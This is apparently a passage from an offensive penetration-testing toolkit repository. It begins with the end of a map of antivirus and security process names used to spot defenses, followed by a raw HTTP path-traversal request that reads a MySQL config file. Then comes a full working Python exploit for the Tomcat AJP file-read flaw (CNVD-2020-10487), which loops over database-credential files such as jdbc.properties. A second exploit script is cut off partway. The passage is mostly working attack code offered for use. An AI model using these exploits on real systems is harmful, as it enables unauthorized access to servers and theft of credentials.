270 | "mscman.exe": "OdysseusMarketingInc", 271 | "msmgt.exe": "Total Velocity Spyware", 272 | "msvxd.exe": "W32/Datom-A", 273 | "mwatch.exe": "已知杀软进程,名称暂未收录", 274 | "nav.exe": "Reuters Limited", 275 | "navapsvc.exe": "Norton AntiVirus", 276 | "navapw32.exe": "Norton AntiVirus", 277 | "navw32.exe": "Norton Antivirus", 278 | "ndd32.exe": "诺顿磁盘医生", 279 | "neowatchlog.exe": "已知杀软进程,名称暂未收录", 280 | "netutils.exe": "已知杀软进程,名称暂未收录", 281 | "nisserv.exe": "Norton", 282 | "nisum.exe": "Norton", 283 | "nmain.exe": "Norton", 284 | "nod32.exe": "ESET Smart Security", 285 | "norton_internet_secu_3.0_407.exe": "已知杀软进程,名称暂未收录", 286 | "notstart.exe": "已知杀软进程,名称暂未收录", 287 | "nprotect.exe": "Symantec", 288 | "npscheck.exe": "Norton", 289 | "npssvc.exe": "Norton", 290 | "ntrtscan.exe": "趋势反病毒应用程序", 291 | "nui.exe": "已知杀软进程,名称暂未收录", 292 | "otfix.exe": "已知杀软进程,名称暂未收录", 293 | "outpostinstall.exe": "Outpost", 294 | "patch.exe": "趋势科技", 295 | "pavw.exe": "已知杀软进程,名称暂未收录", 296 | "pcscan.exe": "趋势科技", 297 | "pdsetup.exe": "已知杀软进程,名称暂未收录", 298 | "persfw.exe": "Tiny Personal Firewall", 299 | "pgmonitr.exe": "PromulGate SpyWare", 300 | "pingscan.exe": "已知杀软进程,名称暂未收录", 301 | "platin.exe": "已知杀软进程,名称暂未收录", 302 | "pop3trap.exe": "PC-cillin", 303 | "poproxy.exe": "NortonAntiVirus", 304 | "popscan.exe": "已知杀软进程,名称暂未收录", 305 | "powerscan.exe": "Integrated Search Technologies", 306 | "ppinupdt.exe": "已知杀软进程,名称暂未收录", 307 | "pptbc.exe": "已知杀软进程,名称暂未收录", 308 | "ppvstop.exe": "已知杀软进程,名称暂未收录", 309 | "prizesurfer.exe": "Prizesurfer", 310 | "prmt.exe": "OpiStat", 311 | "prmvr.exe": "Adtomi", 312 | "processmonitor.exe": "Sysinternals", 313 | "proport.exe": "已知杀软进程,名称暂未收录", 314 | "protectx.exe": "ProtectX", 315 | "pspf.exe": "已知杀软进程,名称暂未收录", 316 | "purge.exe": "已知杀软进程,名称暂未收录", 317 | "qconsole.exe": "Norton AntiVirus Quarantine Console", 318 | "qserver.exe": "Norton Internet Security", 319 | "rapapp.exe": "BlackICE", 320 | "rb32.exe": "RapidBlaster", 321 | "rcsync.exe": "PrizeSurfer", 322 | "realmon.exe": 
"Realmon ", 323 | "rescue.exe": "已知杀软进程,名称暂未收录", 324 | "rescue32.exe": "卡巴斯基互联网安全套装", 325 | "rshell.exe": "已知杀软进程,名称暂未收录", 326 | "rtvscn95.exe": "Real-time virus scanner ", 327 | "rulaunch.exe": "McAfee User Interface", 328 | "run32dll.exe": "PAL PC Spy", 329 | "safeweb.exe": "PSafe Tecnologia", 330 | "sbserv.exe": "Norton Antivirus", 331 | "scrscan.exe": "360杀毒", 332 | "sfc.exe": "System file checker", 333 | "sh.exe": "MKS Toolkit for Win3", 334 | "showbehind.exe": "MicroSmarts Enterprise Component ", 335 | "soap.exe": "System Soap Pro", 336 | "sofi.exe": "已知杀软进程,名称暂未收录", 337 | "sperm.exe": "已知杀软进程,名称暂未收录", 338 | "supporter5.exe": "eScorcher反病毒", 339 | "symproxysvc.exe": "Symantec", 340 | "symtray.exe": "Symantec", 341 | "tbscan.exe": "ThunderBYTE", 342 | "tc.exe": "TimeCalende", 343 | "titanin.exe": "TitanHide", 344 | "tvmd.exe": "Total Velocity", 345 | "tvtmd.exe": " Total Velocity", 346 | "vettray.exe": "eTrust", 347 | "vir-help.exe": "已知杀软进程,名称暂未收录", 348 | "vnpc3000.exe": "已知杀软进程,名称暂未收录", 349 | "vpc32.exe": "Symantec", 350 | "vpc42.exe": "Symantec", 351 | "vshwin32.exe": "McAfee", 352 | "vsmain.exe": "McAfee", 353 | "vsstat.exe": "McAfee", 354 | "wfindv32.exe": "已知杀软进程,名称暂未收录", 355 | "zapro.exe": "Zone Alarm", 356 | "zonealarm.exe": "Zone Alarm", 357 | "AVPM.exe": "Kaspersky", 358 | "A2CMD.exe": "Emsisoft Anti-Malware", 359 | "A2SERVICE.exe": "a-squared free", 360 | "A2FREE.exe": "a-squared Free", 361 | "ADVCHK.exe": "Norton AntiVirus", 362 | "AGB.exe": "安天防线", 363 | "AHPROCMONSERVER.exe": "安天防线", 364 | "AIRDEFENSE.exe": "AirDefense", 365 | "ALERTSVC.exe": "Norton AntiVirus", 366 | "AVIRA.exe": "小红伞杀毒", 367 | "AMON.exe": "Tiny Personal Firewall", 368 | "AVZ.exe": "AVZ", 369 | "ANTIVIR.exe": "已知杀软进程,名称暂未收录", 370 | "APVXDWIN.exe": "熊猫卫士", 371 | "ASHMAISV.exe": "Alwil", 372 | "ASHSERV.exe": "Avast Anti-virus", 373 | "ASHSIMPL.exe": "AVAST!VirusCleaner", 374 | "ASHWEBSV.exe": "Avast", 375 | "ASWUPDSV.exe": "Avast", 376 | "ASWSCAN.exe": "Avast", 377 | 
"AVCIMAN.exe": "熊猫卫士", 378 | "AVCONSOL.exe": "McAfee", 379 | "AVENGINE.exe": "熊猫卫士", 380 | "AVESVC.exe": "Avira AntiVir Security Service", 381 | "AVEVL32.exe": "已知杀软进程,名称暂未收录", 382 | "AVGAM.exe": "AVG", 383 | "AVGCC.exe": "AVG", 384 | "AVGCHSVX.exe": "AVG", 385 | "AVGCSRVX": "AVG", 386 | "AVGNSX.exe": "AVG", 387 | "AVGCC32.exe": "AVG", 388 | "AVGCTRL.exe": "AVG", 389 | "AVGEMC.exe": "AVG", 390 | "AVGFWSRV.exe": "AVG", 391 | "AVGNTMGR.exe": "AVG", 392 | "AVGSERV.exe": "AVG", 393 | "AVGTRAY.exe": "AVG", 394 | "AVGUPSVC.exe": "AVG", 395 | "AVINITNT.exe": "Command AntiVirus for NT Server", 396 | "AVPCC.exe": "Kaspersky", 397 | "AVSERVER.exe": "Kerio MailServer", 398 | "AVSCHED32.exe": "H+BEDV", 399 | "AVSYNMGR.exe": "McAfee", 400 | "AVWUPSRV.exe": "H+BEDV", 401 | "BDSWITCH.exe": "BitDefender Module", 402 | "BLACKD.exe": "BlackICE", 403 | "CCEVTMGR.exe": "Symantec", 404 | "CFP.exe": "COMODO", 405 | "CLAMWIN.exe": "ClamWin Portable", 406 | "CUREIT.exe": "DrWeb CureIT", 407 | "DEFWATCH.exe": "Norton Antivirus", 408 | "DRWADINS.exe": "Dr.Web", 409 | "DRWEB.exe": "Dr.Web", 410 | "DEFENDERDAEMON.exe": "ShadowDefender", 411 | "EWIDOCTRL.exe": "Ewido Security Suite", 412 | "EZANTIVIRUSREGISTRATIONCHECK.exe": "e-Trust Antivirus", 413 | "FIREWALL.exe": "AshampooSoftware", 414 | "FPROTTRAY.exe": "F-PROT Antivirus", 415 | "FPWIN.exe": "Verizon", 416 | "FRESHCLAM.exe": "ClamAV", 417 | "FSAV32.exe": "F-Secure", 418 | "FSBWSYS.exe": "F-secure", 419 | "FSDFWD.exe": "F-Secure", 420 | "FSGK32.exe": "F-Secure", 421 | "FSGK32ST.exe": "F-Secure", 422 | "FSMA32.exe": "F-Secure", 423 | "FSMB32.exe": "F-Secure", 424 | "FSSM32.exe": "F-Secure", 425 | "GUARDGUI.exe": "网游保镖", 426 | "GUARDNT.exe": "IKARUS", 427 | "IAMAPP.exe": "Symantec", 428 | "INOCIT.exe": "eTrust", 429 | "INORPC.exe": "eTrust", 430 | "INORT.exe": "eTrust", 431 | "INOTASK.exe": "eTrust", 432 | "INOUPTNG.exe": "eTrust", 433 | "ISAFE.exe": "eTrust", 434 | "KAV.exe": "Kaspersky", 435 | "KAVMM.exe": "Kaspersky", 436 | "KAVPF.exe": 
"Kaspersky", 437 | "KAVPFW.exe": "Kaspersky", 438 | "KAVSTART.exe": "Kaspersky", 439 | "KAVSVC.exe": "Kaspersky", 440 | "KAVSVCUI.exe": "Kaspersky", 441 | "KMAILMON.exe": "金山毒霸", 442 | "MCAGENT.exe": "McAfee", 443 | "MCMNHDLR.exe": "McAfee", 444 | "MCREGWIZ.exe": "McAfee", 445 | "MCUPDATE.exe": "McAfee", 446 | "MCVSSHLD.exe": "McAfee", 447 | "MINILOG.exe": "Zone Alarm", 448 | "MYAGTSVC.exe": "McAfee", 449 | "MYAGTTRY.exe": "McAfee", 450 | "NAVAPSVC.exe": "Norton", 451 | "NAVAPW32.exe": "Norton", 452 | "NAVLU32.exe": "Norton", 453 | "NAVW32.exe": "Norton Antivirus", 454 | "NEOWATCHLOG.exe": "NeoWatch", 455 | "NEOWATCHTRAY.exe": "NeoWatch", 456 | "NISSERV.exe": "Norton", 457 | "NISUM.exe": "Norton", 458 | "NMAIN.exe": "Norton", 459 | "NOD32.exe": "ESET NOD32", 460 | "NPFMSG.exe": "Norman个人防火墙", 461 | "NPROTECT.exe": "Symantec", 462 | "NSMDTR.exe": "Norton", 463 | "NTRTSCAN.exe": "趋势科技", 464 | "OFCPFWSVC.exe": "OfficeScanNT", 465 | "ONLINENT.exe": "已知杀软进程,名称暂未收录", 466 | "OP_MON.exe": " OutpostFirewall", 467 | "PAVFIRES.exe": "熊猫卫士", 468 | "PAVFNSVR.exe": "熊猫卫士", 469 | "PAVKRE.exe": "熊猫卫士", 470 | "PAVPROT.exe": "熊猫卫士", 471 | "PAVPROXY.exe": "熊猫卫士", 472 | "PAVPRSRV.exe": "熊猫卫士", 473 | "PAVSRV51.exe": "熊猫卫士", 474 | "PAVSS.exe": "熊猫卫士", 475 | "PCCGUIDE.exe": "PC-cillin", 476 | "PCCIOMON.exe": "PC-cillin", 477 | "PCCNTMON.exe": "PC-cillin", 478 | "PCCPFW.exe": "趋势科技", 479 | "PCCTLCOM.exe": "趋势科技", 480 | "PCTAV.exe": "PC Tools AntiVirus", 481 | "PERSFW.exe": "Tiny Personal Firewall", 482 | "PERVAC.exe": "已知杀软进程,名称暂未收录", 483 | "PESTPATROL.exe": "Ikarus", 484 | "PREVSRV.exe": "熊猫卫士", 485 | "RTVSCN95.exe": "Real-time Virus Scanner", 486 | "SAVADMINSERVICE.exe": "SAV", 487 | "SAVMAIN.exe": "SAV", 488 | "SAVSCAN.exe": "SAV", 489 | "SDHELP.exe": "Spyware Doctor", 490 | "SHSTAT.exe": "McAfee", 491 | "SPBBCSVC.exe": "Symantec", 492 | "SPIDERCPL.exe": "Dr.Web", 493 | "SPIDERML.exe": "Dr.Web", 494 | "SPIDERUI.exe": "Dr.Web", 495 | "SPYBOTSD.exe": "Spybot ", 496 | "SWAGENT.exe": 
"SonicWALL", 497 | "SWDOCTOR.exe": "SonicWALL", 498 | "SWNETSUP.exe": "Sophos", 499 | "SYMLCSVC.exe": "Symantec", 500 | "SYMPROXYSVC.exe": "Symantec", 501 | "SYMSPORT.exe": "Symantec", 502 | "SYMWSC.exe": "Symantec", 503 | "SYNMGR.exe": "Symantec", 504 | "TMLISTEN.exe": "趋势科技", 505 | "TMNTSRV.exe": "趋势科技", 506 | "TMPROXY.exe": "趋势科技", 507 | "TNBUTIL.exe": "Anti-Virus", 508 | "VBA32ECM.exe": "已知杀软进程,名称暂未收录", 509 | "VBA32IFS.exe": "已知杀软进程,名称暂未收录", 510 | "VBA32PP3.exe": "已知杀软进程,名称暂未收录", 511 | "VCRMON.exe": "VirusChaser", 512 | "VRMONNT.exe": "HAURI", 513 | "VRMONSVC.exe": "HAURI", 514 | "VSHWIN32.exe": "McAfee", 515 | "VSSTAT.exe": "McAfee", 516 | "XCOMMSVR.exe": "BitDefender", 517 | "ZONEALARM.exe": "Zone Alarm", 518 | "360rp.exe": "360杀毒", 519 | "afwServ.exe": " Avast Antivirus", 520 | "safeboxTray.exe": "360杀毒", 521 | "360safebox.exe": "360杀毒", 522 | "QQPCTray.exe": "QQ电脑管家", 523 | "KSafeTray.exe": "金山毒霸", 524 | "KSafeSvc.exe": "金山毒霸", 525 | "KWatch.exe": "金山毒霸", 526 | "gov_defence_service.exe": "云锁", 527 | "gov_defence_daemon.exe": "云锁", 528 | "smartscreen.exe": "Windows Defender", 529 | "SunloginClient.exe": "向日葵", 530 | "finalshell.exe": "finalshell终端管理", 531 | "navicat.exe": "数据库管理", 532 | "AliSecGuard.exe": "阿里云盾", 533 | "AliYunDunUpdate.exe": "阿里云盾", 534 | "AliYunDun.exe": "阿里云盾", 535 | "CmsGoAgent.windows-amd64.": "阿里云监控", -------------------------------------------------------------------------------- /property/test.txt: -------------------------------------------------------------------------------- 1 | POST /mac/gateway.php HTTP/1.1 2 | Host: x.x.x.x 3 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 4 | Content-Length: 43 5 | Charset: utf-8 6 | Content-Type: application/x-www-form-urlencoded 7 | Referer: https://servicewechat.com/wxe1d5f6d5f6c6a21f/5/page-frame.html 8 | Accept-Encoding: gzip 9 | 10 | json={"url":"/general/../../mysql5/my.ini"} 11 | 
-------------------------------------------------------------------------------- /pythonexp/Tomcat/CNVD-2020-10487-Tomcat-Ajp-lfi.py: -------------------------------------------------------------------------------- 1 | ######f0ng######usage:ip -p port 2 | # -*- coding: utf-8 -*- 3 | 4 | #CNVD-2020-10487 Tomcat-Ajp lfi 5 | 6 | import struct 7 | 8 | # Some references: 9 | # https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html 10 | def pack_string(s): 11 | if s is None: 12 | return struct.pack(">h", -1) 13 | l = len(s) 14 | return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0) 15 | def unpack(stream, fmt): 16 | size = struct.calcsize(fmt) 17 | buf = stream.read(size) 18 | return struct.unpack(fmt, buf) 19 | def unpack_string(stream): 20 | size, = unpack(stream, ">h") 21 | if size == -1: # null string 22 | return None 23 | res, = unpack(stream, "%ds" % size) 24 | stream.read(1) # \0 25 | return res 26 | class NotFoundException(Exception): 27 | pass 28 | class AjpBodyRequest(object): 29 | # server == web server, container == servlet 30 | SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2) 31 | MAX_REQUEST_LENGTH = 8186 32 | def __init__(self, data_stream, data_len, data_direction=None): 33 | self.data_stream = data_stream 34 | self.data_len = data_len 35 | self.data_direction = data_direction 36 | def serialize(self): 37 | data = self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH) 38 | if len(data) == 0: 39 | return struct.pack(">bbH", 0x12, 0x34, 0x00) 40 | else: 41 | res = struct.pack(">H", len(data)) 42 | res += data 43 | if self.data_direction == AjpBodyRequest.SERVER_TO_CONTAINER: 44 | header = struct.pack(">bbH", 0x12, 0x34, len(res)) 45 | else: 46 | header = struct.pack(">bbH", 0x41, 0x42, len(res)) 47 | return header + res 48 | def send_and_receive(self, socket, stream): 49 | while True: 50 | data = self.serialize() 51 | socket.send(data) 52 | r = AjpResponse.receive(stream) 53 | while r.prefix_code != AjpResponse.GET_BODY_CHUNK and r.prefix_code != 
AjpResponse.SEND_HEADERS: 54 | r = AjpResponse.receive(stream) 55 | 56 | if r.prefix_code == AjpResponse.SEND_HEADERS or len(data) == 4: 57 | break 58 | class AjpForwardRequest(object): 59 | _, OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, ACL, REPORT, VERSION_CONTROL, CHECKIN, CHECKOUT, UNCHECKOUT, SEARCH, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE_CONTROL, MKACTIVITY = range(28) 60 | REQUEST_METHODS = {'GET': GET, 'POST': POST, 'HEAD': HEAD, 'OPTIONS': OPTIONS, 'PUT': PUT, 'DELETE': DELETE, 'TRACE': TRACE} 61 | # server == web server, container == servlet 62 | SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2) 63 | COMMON_HEADERS = ["SC_REQ_ACCEPT", 64 | "SC_REQ_ACCEPT_CHARSET", "SC_REQ_ACCEPT_ENCODING", "SC_REQ_ACCEPT_LANGUAGE", "SC_REQ_AUTHORIZATION", 65 | "SC_REQ_CONNECTION", "SC_REQ_CONTENT_TYPE", "SC_REQ_CONTENT_LENGTH", "SC_REQ_COOKIE", "SC_REQ_COOKIE2", 66 | "SC_REQ_HOST", "SC_REQ_PRAGMA", "SC_REQ_REFERER", "SC_REQ_USER_AGENT" 67 | ] 68 | ATTRIBUTES = ["context", "servlet_path", "remote_user", "auth_type", "query_string", "route", "ssl_cert", "ssl_cipher", "ssl_session", "req_attribute", "ssl_key_size", "secret", "stored_method"] 69 | def __init__(self, data_direction=None): 70 | self.prefix_code = 0x02 71 | self.method = None 72 | self.protocol = None 73 | self.req_uri = None 74 | self.remote_addr = None 75 | self.remote_host = None 76 | self.server_name = None 77 | self.server_port = None 78 | self.is_ssl = None 79 | self.num_headers = None 80 | self.request_headers = None 81 | self.attributes = None 82 | self.data_direction = data_direction 83 | def pack_headers(self): 84 | self.num_headers = len(self.request_headers) 85 | res = "" 86 | res = struct.pack(">h", self.num_headers) 87 | for h_name in self.request_headers: 88 | if h_name.startswith("SC_REQ"): 89 | code = AjpForwardRequest.COMMON_HEADERS.index(h_name) + 1 90 | res += struct.pack("BB", 0xA0, code) 91 | else: 92 | res += 
pack_string(h_name) 93 | 94 | res += pack_string(self.request_headers[h_name]) 95 | return res 96 | 97 | def pack_attributes(self): 98 | res = b"" 99 | for attr in self.attributes: 100 | a_name = attr['name'] 101 | code = AjpForwardRequest.ATTRIBUTES.index(a_name) + 1 102 | res += struct.pack("b", code) 103 | if a_name == "req_attribute": 104 | aa_name, a_value = attr['value'] 105 | res += pack_string(aa_name) 106 | res += pack_string(a_value) 107 | else: 108 | res += pack_string(attr['value']) 109 | res += struct.pack("B", 0xFF) 110 | return res 111 | def serialize(self): 112 | res = "" 113 | res = struct.pack("bb", self.prefix_code, self.method) 114 | res += pack_string(self.protocol) 115 | res += pack_string(self.req_uri) 116 | res += pack_string(self.remote_addr) 117 | res += pack_string(self.remote_host) 118 | res += pack_string(self.server_name) 119 | res += struct.pack(">h", self.server_port) 120 | res += struct.pack("?", self.is_ssl) 121 | res += self.pack_headers() 122 | res += self.pack_attributes() 123 | if self.data_direction == AjpForwardRequest.SERVER_TO_CONTAINER: 124 | header = struct.pack(">bbh", 0x12, 0x34, len(res)) 125 | else: 126 | header = struct.pack(">bbh", 0x41, 0x42, len(res)) 127 | return header + res 128 | def parse(self, raw_packet): 129 | stream = StringIO(raw_packet) 130 | self.magic1, self.magic2, data_len = unpack(stream, "bbH") 131 | self.prefix_code, self.method = unpack(stream, "bb") 132 | self.protocol = unpack_string(stream) 133 | self.req_uri = unpack_string(stream) 134 | self.remote_addr = unpack_string(stream) 135 | self.remote_host = unpack_string(stream) 136 | self.server_name = unpack_string(stream) 137 | self.server_port = unpack(stream, ">h") 138 | self.is_ssl = unpack(stream, "?") 139 | self.num_headers, = unpack(stream, ">H") 140 | self.request_headers = {} 141 | for i in range(self.num_headers): 142 | code, = unpack(stream, ">H") 143 | if code > 0xA000: 144 | h_name = AjpForwardRequest.COMMON_HEADERS[code - 0xA001] 
145 | else: 146 | h_name = unpack(stream, "%ds" % code) 147 | stream.read(1) # \0 148 | h_value = unpack_string(stream) 149 | self.request_headers[h_name] = h_value 150 | def send_and_receive(self, socket, stream, save_cookies=False): 151 | res = [] 152 | i = socket.sendall(self.serialize()) 153 | if self.method == AjpForwardRequest.POST: 154 | return res 155 | 156 | r = AjpResponse.receive(stream) 157 | assert r.prefix_code == AjpResponse.SEND_HEADERS 158 | res.append(r) 159 | if save_cookies and 'Set-Cookie' in r.response_headers: 160 | self.headers['SC_REQ_COOKIE'] = r.response_headers['Set-Cookie'] 161 | 162 | # read body chunks and end response packets 163 | while True: 164 | r = AjpResponse.receive(stream) 165 | res.append(r) 166 | if r.prefix_code == AjpResponse.END_RESPONSE: 167 | break 168 | elif r.prefix_code == AjpResponse.SEND_BODY_CHUNK: 169 | continue 170 | else: 171 | raise NotImplementedError 172 | break 173 | 174 | return res 175 | 176 | class AjpResponse(object): 177 | _,_,_,SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE, GET_BODY_CHUNK = range(7) 178 | COMMON_SEND_HEADERS = [ 179 | "Content-Type", "Content-Language", "Content-Length", "Date", "Last-Modified", 180 | "Location", "Set-Cookie", "Set-Cookie2", "Servlet-Engine", "Status", "WWW-Authenticate" 181 | ] 182 | def parse(self, stream): 183 | # read headers 184 | self.magic, self.data_length, self.prefix_code = unpack(stream, ">HHb") 185 | 186 | if self.prefix_code == AjpResponse.SEND_HEADERS: 187 | self.parse_send_headers(stream) 188 | elif self.prefix_code == AjpResponse.SEND_BODY_CHUNK: 189 | self.parse_send_body_chunk(stream) 190 | elif self.prefix_code == AjpResponse.END_RESPONSE: 191 | self.parse_end_response(stream) 192 | elif self.prefix_code == AjpResponse.GET_BODY_CHUNK: 193 | self.parse_get_body_chunk(stream) 194 | else: 195 | raise NotImplementedError 196 | 197 | def parse_send_headers(self, stream): 198 | self.http_status_code, = unpack(stream, ">H") 199 | self.http_status_msg = 
unpack_string(stream) 200 | self.num_headers, = unpack(stream, ">H") 201 | self.response_headers = {} 202 | for i in range(self.num_headers): 203 | code, = unpack(stream, ">H") 204 | if code <= 0xA000: # custom header 205 | h_name, = unpack(stream, "%ds" % code) 206 | stream.read(1) # \0 207 | h_value = unpack_string(stream) 208 | else: 209 | h_name = AjpResponse.COMMON_SEND_HEADERS[code-0xA001] 210 | h_value = unpack_string(stream) 211 | self.response_headers[h_name] = h_value 212 | 213 | def parse_send_body_chunk(self, stream): 214 | self.data_length, = unpack(stream, ">H") 215 | self.data = stream.read(self.data_length+1) 216 | 217 | def parse_end_response(self, stream): 218 | self.reuse, = unpack(stream, "b") 219 | 220 | def parse_get_body_chunk(self, stream): 221 | rlen, = unpack(stream, ">H") 222 | return rlen 223 | 224 | @staticmethod 225 | def receive(stream): 226 | r = AjpResponse() 227 | r.parse(stream) 228 | return r 229 | 230 | import socket 231 | 232 | def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET): 233 | fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER) 234 | fr.method = method 235 | fr.protocol = "HTTP/1.1" 236 | fr.req_uri = req_uri 237 | fr.remote_addr = target_host 238 | fr.remote_host = None 239 | fr.server_name = target_host 240 | fr.server_port = 80 241 | fr.request_headers = { 242 | 'SC_REQ_ACCEPT': 'text/html', 243 | 'SC_REQ_CONNECTION': 'keep-alive', 244 | 'SC_REQ_CONTENT_LENGTH': '0', 245 | 'SC_REQ_HOST': target_host, 246 | 'SC_REQ_USER_AGENT': 'Mozilla', 247 | 'Accept-Encoding': 'gzip, deflate, sdch', 248 | 'Accept-Language': 'en-US,en;q=0.5', 249 | 'Upgrade-Insecure-Requests': '1', 250 | 'Cache-Control': 'max-age=0' 251 | } 252 | fr.is_ssl = False 253 | fr.attributes = [] 254 | return fr 255 | 256 | class Tomcat(object): 257 | def __init__(self, target_host, target_port): 258 | self.target_host = target_host 259 | self.target_port = target_port 260 | 261 | self.socket = 
socket.socket(socket.AF_INET, socket.SOCK_STREAM) 262 | self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 263 | self.socket.connect((target_host, target_port)) 264 | self.stream = self.socket.makefile("rb", bufsize=0) 265 | 266 | def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]): 267 | self.req_uri = req_uri 268 | self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri, method=AjpForwardRequest.REQUEST_METHODS.get(method)) 269 | print("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri)) 270 | if user is not None and password is not None: 271 | self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + ("%s:%s" % (user, password)).encode('base64').replace('\n', '') 272 | for h in headers: 273 | self.forward_request.request_headers[h] = headers[h] 274 | for a in attributes: 275 | self.forward_request.attributes.append(a) 276 | responses = self.forward_request.send_and_receive(self.socket, self.stream) 277 | if len(responses) == 0: 278 | return None, None 279 | snd_hdrs_res = responses[0] 280 | data_res = responses[1:-1] 281 | if len(data_res) == 0: 282 | print("No data in response. 
Headers:%s\n" % snd_hdrs_res.response_headers) 283 | return snd_hdrs_res, data_res 284 | 285 | ''' 286 | javax.servlet.include.request_uri 287 | javax.servlet.include.path_info 288 | javax.servlet.include.servlet_path 289 | ''' 290 | 291 | import argparse 292 | parser = argparse.ArgumentParser() 293 | parser.add_argument("target", type=str, help="Hostname or IP to attack") 294 | parser.add_argument('-p', '--port', type=int, default=8009, help="AJP port to attack (default is 8009)") 295 | parser.add_argument("-f", '--file', type=str, default='WEB-INF/web.xml', help="file path :(WEB-INF/web.xml)") 296 | args = parser.parse_args() 297 | t = Tomcat(args.target, args.port) 298 | 299 | _,data = t.perform_request('/asdf',attributes=[ 300 | {'name':'req_attribute','value':['javax.servlet.include.request_uri','/']}, 301 | {'name':'req_attribute','value':['javax.servlet.include.path_info',args.file]}, 302 | {'name':'req_attribute','value':['javax.servlet.include.servlet_path','/']}, 303 | ]) 304 | print('----------------------------') 305 | print("".join([d.data for d in data])) 306 | 307 | if "WEB-INF" in "".join([d.data for d in data]): 308 | print("**********************注意可能有WEB-INF配置文件*************************") 309 | 310 | words_list = ['WEB-INF/classes/application-config.xml','WEB-INF/classes/application-druid.yml','WEB-INF/classes/jdbc.properties','WEB-INF/classes/db.properties', 311 | 'WEB-INF/classes/database.properties','WEB-INF/classes/datasource.properties','WEB-INF/classes/mybatis.properties','WEB-INF/classes/application.properties',] 312 | 313 | for word in words_list: 314 | 315 | print(":::::::::" + word + ":::::::::") 316 | 317 | _,data = t.perform_request('/asdf',attributes=[ 318 | {'name':'req_attribute','value':['javax.servlet.include.request_uri','/']}, 319 | {'name':'req_attribute','value':['javax.servlet.include.path_info',word]}, 320 | {'name':'req_attribute','value':['javax.servlet.include.servlet_path','/']}, 321 | ]) 322 | 
print('----------------------------') 323 | if "Error report" in "".join([d.data for d in data]): 324 | pass 325 | else: 326 | print("".join([d.data for d in data])) 327 | -------------------------------------------------------------------------------- /pythonexp/Tomcat/CNVD-2020-10487-pro.py: -------------------------------------------------------------------------------- 1 | ######f0ng######usage:ip -p port 2 | # -*- coding:utf-8 -*- 3 | # 4 | # Julien Legras - Synacktiv 5 | # 6 | # THIS SOFTWARE IS PROVIDED BY SYNACKTIV ''AS IS'' AND ANY 7 | # EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 8 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 9 | # DISCLAIMED. IN NO EVENT SHALL SYNACKTIV BE LIABLE FOR ANY 10 | # DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 11 | # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 12 | # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND 13 | # ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 14 | # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 15 | # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
16 | 17 | 18 | from ajpy.ajp import AjpResponse, AjpForwardRequest, AjpBodyRequest, NotFoundException 19 | from pprint import pprint, pformat 20 | 21 | import socket 22 | import argparse 23 | import logging 24 | import re 25 | import os 26 | from StringIO import StringIO 27 | import logging 28 | from colorlog import ColoredFormatter 29 | from urllib import unquote 30 | 31 | 32 | def setup_logger(): 33 | """Return a logger with a default ColoredFormatter.""" 34 | formatter = ColoredFormatter( 35 | "[%(asctime)s.%(msecs)03d] %(log_color)s%(levelname)-8s%(reset)s %(white)s%(message)s", 36 | datefmt="%Y-%m-%d %H:%M:%S", 37 | reset=True, 38 | log_colors={ 39 | 'DEBUG': 'bold_purple', 40 | 'INFO': 'bold_green', 41 | 'WARNING': 'bold_yellow', 42 | 'ERROR': 'bold_red', 43 | 'CRITICAL': 'bold_red', 44 | } 45 | ) 46 | 47 | logger = logging.getLogger('meow') 48 | handler = logging.StreamHandler() 49 | handler.setFormatter(formatter) 50 | logger.addHandler(handler) 51 | logger.setLevel(logging.DEBUG) 52 | 53 | return logger 54 | 55 | 56 | logger = setup_logger() 57 | 58 | 59 | # helpers 60 | def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET): 61 | fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER) 62 | fr.method = method 63 | fr.protocol = "HTTP/1.1" 64 | fr.req_uri = req_uri 65 | fr.remote_addr = target_host 66 | fr.remote_host = None 67 | fr.server_name = target_host 68 | fr.server_port = 80 69 | fr.request_headers = { 70 | 'SC_REQ_ACCEPT': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 71 | 'SC_REQ_CONNECTION': 'keep-alive', 72 | 'SC_REQ_CONTENT_LENGTH': '0', 73 | 'SC_REQ_HOST': target_host, 74 | 'SC_REQ_USER_AGENT': 'Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0', 75 | 'Accept-Encoding': 'gzip, deflate, sdch', 76 | 'Accept-Language': 'en-US,en;q=0.5', 77 | 'Upgrade-Insecure-Requests': '1', 78 | 'Cache-Control': 'max-age=0' 79 | } 80 | fr.is_ssl = False 81 | 82 | fr.attributes 
